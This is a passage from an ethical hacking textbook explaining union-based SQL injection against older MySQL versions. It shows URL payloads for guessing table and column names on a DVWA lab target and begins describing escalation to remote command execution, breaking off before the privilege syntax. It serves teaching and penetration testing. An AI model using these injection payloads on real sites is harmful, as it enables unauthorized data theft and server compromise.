MySQL Version ≤ 5
Most of the times, you would be up against mysql version 5; however, in some cases where you
are against mysql version 1–4, you need to do a little extra hard work, but chances of succeeding
are quite low as compared to mysql version 5. Since in older versions of mysql there is no informa-
tion_schema database, we have to guess the tables and columns associated with the tables. We will
have to rely upon the errors to see if a current table or column is present or not.
Guessing Table Names
Let’s assume that in the earlier scenario, we are up against a mysql 4 database and we know the
database name, we now need to guess the table names. The syntax for this would be as follows:
Syntax
http://target.com/index.php?support=yes’ and 1=0 union select 1,2,3,4,5 from dvwa.admins--+
(Table doesn’t exist or any other error)
352
◾
Ethical Hacking and Penetration Testing Guide
An error was generated, indicating that the admin table does not exist. If a table existed, there
wouldn’t have been an error message.
Guessing Columns
In a similar manner, we can guess column names, and based upon the errors generated, we can
conclude if it’s a valid column or not.
Syntax
http://target.com/index.php?support=yes’ and 1=0 union select 1,2,user,4,5 from dvwa.users--+
(Table doesn’t exist or any other error)
If we have determined the correct column name, all the data inside the column would be
displayed to us.
SQL Injection to Remote Command Execution
SQL injection vulnerabilities are also used to execute commands on the target operating system.
Obviously, it depends upon the operating system and the privileges that our user has. In our case,
we have root-level privileges upon the mysql server. Therefore, we would be able to execute all
commands such as SELECT, INSERT, UPDATE, and DELETE. However, we are interested
only in higher-level privileges such as FILE, which would allow us to read/write files on the web-
server. Let’s see the syntax for enumerating user privileges:
Web Hacking
◾
Dostları ilə paylaş: |